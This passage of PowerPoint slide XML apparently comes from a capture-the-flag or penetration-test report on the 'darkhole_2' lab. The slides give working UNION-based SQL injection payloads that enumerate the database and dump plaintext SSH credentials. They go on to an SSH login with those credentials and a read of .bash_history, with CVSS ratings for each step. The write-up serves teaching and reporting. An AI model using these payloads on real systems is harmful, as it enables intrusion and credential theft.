                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD3341BB-0F17-0E8E-4302-14B35E20A9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7248268" y="3687850"/>
            <a:ext cx="4650040" cy="2385291"/>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33453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08096-D76A-0ADA-8934-83A507FFB2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665A3-35E4-5F3B-9D58-815F64C1FA3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="258417"/>
            <a:ext cx="6599583" cy="5913783"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>ORDER BY 7’ gave an error. We could now be sure there wasn’t a 7th column.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>The following command then produced the outputs shown in Figure below. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t>id=' UNION SELECT 1,2,3,4,5,6 -- - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>URL Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" i="1" dirty="0"/>
              <a:t>%27%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%20%2d%2d%20%2d </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>We noticed columns 2, 3, 5, and 6 are reflected in the user interface, indicating that these columns could be further used to dump data. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44CA212D-50EC-422D-6045-20D5637F5431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="722207" y="1117369"/>
            <a:ext cx="5771394" cy="742604"/>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EFA4EAC7-1F26-2758-679B-0D5A84D266DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7198424" y="415637"/>
            <a:ext cx="4564074" cy="2421081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D46BDD58-BA72-9FAB-1EB1-5DA8E53952D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7198424" y="3291147"/>
            <a:ext cx="4564074" cy="2587337"/>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99008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C0D09-0E5A-17EE-4F3D-9501D79A85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3EF53-9E65-D20C-D759-41778F29DBC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="298175"/>
            <a:ext cx="7414591" cy="6102626"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2300" b="1" i="1" dirty="0"/>
              <a:t>We also found database name out by entering the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2300" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2300" b="1" i="1" dirty="0"/>
              <a:t> command. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3400" b="1" dirty="0"/>
              <a:t>Database Schema Enumeration via SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> page was vulnerable to UNION-based SQL injection through the id parameter, allowing to enumerate the database schema, extract table structures, and retrieve sensitive data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Severity: High    CVSS Score: 8.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>id=' UNION SELECT1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2300" b="1" i="1" dirty="0"/>
              <a:t>To list and display the tables of the ‘darkhole_2’ database: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3400" b="1" dirty="0"/>
              <a:t>Table and Column Enumeration via SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This vulnerability allows to enumerate database tables and columns, leading to unauthorized access to sensitive information, including user credentials stored in the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Critical   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>CVSS Score: 9.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>CVSS Vector: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>id=' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0"/>
              <a:t>='darkhole_2'-- - </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B613084-DCA2-C40A-821B-EE17B421EDDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7722704" y="200099"/>
            <a:ext cx="4289187" cy="2802873"/>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DFD120F7-6006-2F40-17C6-D5235373700E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7722704" y="3255027"/>
            <a:ext cx="4289187" cy="2802873"/>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690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42243-D4AD-9014-C0A8-98A8BE5E32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EB615-9006-8E26-0BA3-33F5140B71B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="327991"/>
            <a:ext cx="6887817" cy="6211957"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" u="sng" dirty="0"/>
              <a:t>SSH Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1" i="1" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2100" b="1" i="1" dirty="0"/>
              <a:t>Upon trying, we were able to see there is a table called ‘ssh’, We now needed to find the column names of the table:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t>id=' UNION SELECT 1,GROUP_CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t>),3,4,5,6 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t>='ssh'-- - </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2100" b="1" i="1" dirty="0"/>
              <a:t>Tried extracting more information from the ‘ssh’ table for the user credentials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0"/>
              <a:t>Credential Disclosure from ssh Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Vulnerability Description:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> Vulnerability allowed extraction of plaintext SSH credentials stored in the ssh database table. Retrieved credentials (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>) through UNION-based SQLi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Severity: Critical </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1700" b="1" dirty="0"/>
              <a:t>CVSS Score: 9.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1700" b="1" dirty="0"/>
              <a:t>CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" b="1" dirty="0"/>
              <a:t>Command :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" i="1" dirty="0"/>
              <a:t>id=' UNION SELECT 1,user,pass,4,5,6 FROM ssh – -</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" i="1" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2100" b="1" i="1" dirty="0"/>
              <a:t>ound credential user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2100" b="1" i="1" u="sng" dirty="0"/>
              <a:t>‘jehad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2100" b="1" i="1" dirty="0"/>
              <a:t>’ using the password ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2100" b="1" i="1" u="sng" dirty="0"/>
              <a:t>fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2100" b="1" i="1" dirty="0"/>
              <a:t>’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{579B6BAA-E712-C31D-ACCE-7158548E3B16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7535917" y="207818"/>
            <a:ext cx="4385488" cy="2774372"/>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B2380FB9-2427-90B7-FB06-E45236703E15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7534906" y="3298769"/>
            <a:ext cx="4385488" cy="2774372"/>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596779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39457-3BFA-2DFB-38A3-64BA7A1531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28C6-81C8-0E0E-8397-4FF0DCA853D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308113" y="337930"/>
            <a:ext cx="6224767" cy="6221895"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="40000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" i="1" dirty="0"/>
              <a:t>We tried authenticating as the user ‘jehad’ using the password ‘fool’. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0"/>
              <a:t>SSH Login via Reused Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>The compromised SSH credentials (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1"/>
              <a:t>jehad:fool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>) extracted via SQL injection were reused for SSH access to the target server. This credential reuse allowed to bypass authentication mechanisms and gain unauthorized shell access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0"/>
              <a:t>Severity: High    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>CVSS Score: 8.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" dirty="0"/>
              <a:t>CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" i="1" dirty="0"/>
              <a:t>ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>jehad@192.168.139.143</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" i="1" dirty="0"/>
              <a:t>We checked for bash history of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" i="1" dirty="0" err="1"/>
              <a:t>user:johad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" i="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="5100" b="1" dirty="0"/>
              <a:t>Bash History Disclosure</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="5100" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>The target system exposed sensitive user information through the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>file. After gaining SSH access, Able to read the bash history of the user jehad, which included clear-text passwords, internal commands, and URLs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0"/>
              <a:t>Severity: High   CVSS Score</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0"/>
              <a:t>7.8 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="3600" b="1" dirty="0"/>
              <a:t>CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" i="1" dirty="0"/>
              <a:t>cat ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" i="1" dirty="0" err="1"/>
              <a:t>bash_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" i="1" dirty="0"/>
              <a:t>Here, we saw a bunch of web requests that had been made to this local port and something already running on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" i="1" dirty="0" err="1"/>
              <a:t>localhost:port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" i="1" dirty="0"/>
              <a:t> 9999. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ABD2FA9-FF03-3B82-6BD3-B52865C3C7A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6878320" y="203769"/>
            <a:ext cx="5079157" cy="2606140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
